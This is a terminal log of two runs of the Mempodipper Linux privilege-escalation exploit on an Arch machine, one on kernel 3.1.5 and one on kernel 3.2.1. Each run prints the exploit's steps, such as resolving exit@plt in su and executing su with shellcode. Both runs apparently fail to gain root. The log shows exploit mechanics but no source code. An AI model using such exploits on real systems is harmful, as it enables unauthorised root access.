[0:majki@arch] ~ % uname -a pts/0 | 13:15
Linux arch 3.1.5-1-ARCH #1 SMP PREEMPT Sat Dec 10 14:43:09 CET 2011 x86_64 Intel(R) Core(TM) i5-2415M CPU @ 2.30GHz GenuineIntel GNU/Linux
[0:majki@arch] ~ % whoami pts/0 | 13:15
majki
[0:majki@arch] ~ % ./mempodipper pts/0 | 13:15
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/1315/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401ab8.
[+] Calculating su padding.
[+] Seeking to offset 0x401aaf.
[+] Executing su with shellcode.
[125:majki@arch] ~ % whoami pts/0 | 13:15
majki
[0:majki@arch] ~ %
--
0:majki@arch] ~ % uname -a pts/0 | 13:29
Linux arch 3.2.1-1-ARCH #1 SMP PREEMPT Fri Jan 13 06:50:31 CET 2012 x86_64 Intel(R) Core(TM) i5-2415M CPU @ 2.30GHz GenuineIntel GNU/Linux
[0:majki@arch] ~ % whoami pts/0 | 13:29
majki
[0:majki@arch] ~ % ./mempodipper pts/0 | 13:29
===============================
= Mempodipper =
= by zx2c4 =
= Jan 21, 2012 =
===============================
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/610/mem in child.
[+] Sending fd 3 to parent.
[+] Received fd at 5.
[+] Assigning fd 5 to stderr.
[+] Reading su for exit@plt.
[+] Resolved exit@plt to 0x401a60.
[+] Calculating su padding.
[+] Seeking to offset 0x401a57.
[+] Executing su with shellcode.
zsh: segmentation fault ./mempodipper
[139:majki@arch] ~ % whoami pts/0 | 13:29
majki
[0:majki@arch] ~ %